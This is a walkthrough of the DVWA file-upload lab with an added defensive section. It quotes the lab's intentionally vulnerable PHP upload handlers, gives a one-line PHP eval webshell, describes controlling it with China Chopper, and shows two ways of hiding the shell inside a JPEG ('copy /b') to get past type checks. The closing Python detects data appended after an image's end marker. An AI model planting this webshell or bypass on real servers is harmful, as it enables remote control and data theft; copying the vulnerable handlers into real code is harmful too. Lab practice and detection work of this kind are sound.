LOW Level
Code:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
DVWA_WEB_PAGE_TO_ROOT is the web root directory.
target_path is the absolute path the uploaded file will be written to.
basename( $_FILES['uploaded']['name'] ) takes the original name of the uploaded file and appends it to target_path.
The if statement checks whether the file was moved to that path; if not, it reports that the upload failed.
Overall, this level applies no filtering at all to the uploaded file's type, so a .php file can be uploaded freely.
First we construct a one-line webshell (一句话木马):
<?php @eval($_POST[value]);?>
Open Notepad, paste it in, save, and rename the file with a .php extension.
Then upload it.
The upload succeeds; copy the path /hackable/uploads/1muma.php and append it to http://127.0.0.1/dvwa/
(At this point the level is actually done; we'll take it a little further.)
Then copy that URL and open it in China Chopper (中国菜刀).
The address is the URL just copied; in the small box on the right enter "value" (this can be changed freely, as long as it matches whatever is written in the shell).
Once connected, files on the target machine can be uploaded and downloaded at will.
Medium
Look at the code first:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Compared with Low, three variables are added to hold the uploaded file's name, type and size.
The if statement checks whether the uploaded file's type is image/jpeg or image/png and whether its size is under 100 KB. This is only a simple check of the type reported with the upload ($_FILES['uploaded']['type'], which the client supplies), so we can write the one-line webshell into an image.
Method 1:
This uses the C32 tool (running it in a virtual machine is recommended; copies downloaded from random sites come bundled with too much extra software).
As shown in the figure, drag the image into the tool, switch to hexadecimal mode, append the one-line webshell at the very end and save the file. Change the extension back to .jpg; the image still displays normally.
The upload succeeds. Delete the previous shell from the folder and test whether this one can be connected with China Chopper:
First open it directly in the browser:
The image is served directly; now connect with China Chopper:
Success!
Method 2:
Open a cmd terminal:
copy /b 1.jpg+1.asp 2.jpg
1.jpg is the image you want to upload, 1.asp or 1.php is the webshell script, and 2.jpg is the combined image.
Success.
High
Look at the code first:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Hmm... honestly, I haven't learned PHP yet, so I can't quite tell what the difference is; in practice the same approach as Medium completes this level too... I'll come back and revise this once I've learned PHP and know what the trick is~
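As an added, defender-side example (not code from the original post or from DVWA): the files produced by Methods 1 and 2 above, which the author notes also pass the High level's checks, are valid images with a PHP payload appended after the image's own end marker. The Python below walks JPEG segments and PNG chunks and returns whatever follows the EOI marker or the IEND chunk, which is the signal an upload handler or a scan of hackable/uploads/ can act on; the sample images are constructed inline.

```python
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def jpeg_end(data: bytes) -> Optional[int]:
    """Offset just past EOI, found by walking segments (not by searching for
    the last FF D9, which appended data could contain)."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None                                   # structure broken
        marker = data[pos + 1]
        if marker == 0xD9:                                # EOI: logical end
            return pos + 2
        if marker == 0xFF:                                # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:      # TEM / RSTn: no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
        if marker == 0xDA:                                # SOS: skip entropy data
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] not in (0x00, *range(0xD0, 0xD8)):
                    break
                pos += 1
    return None

def png_end(data: bytes) -> Optional[int]:
    """Offset just past the IEND chunk (length + type + data + CRC)."""
    if data[:8] != PNG_SIG:
        return None
    pos = 8
    while pos + 8 <= len(data):
        length = int.from_bytes(data[pos:pos + 4], "big")
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None

def trailing_bytes(data: bytes) -> Optional[bytes]:
    """Bytes after the image's logical end; None if not a parsable JPEG/PNG."""
    end = jpeg_end(data) if data[:2] == b"\xff\xd8" else png_end(data)
    return None if end is None else data[end:]

# Constructed samples: minimal JPEG and PNG (CRCs are not verified here), and the
# JPEG with a harmless PHP tag appended the way `copy /b` would append a script.
CLEAN_JPEG = (b"\xff\xd8" + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\xff\x00\x34" + b"\xff\xd9")
CLEAN_PNG = PNG_SIG + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17 + b"\x00\x00\x00\x00IEND\xaeB`\x82"
TAMPERED_JPEG = CLEAN_JPEG + b"<?php echo 1; ?>"
```

A non-empty result (or None, meaning the file is not a parsable image at all) is a reason to reject or re-encode the upload before it reaches hackable/uploads/; combined with a server-generated filename and a no-execute rule for the upload directory, that closes the path this walkthrough uses.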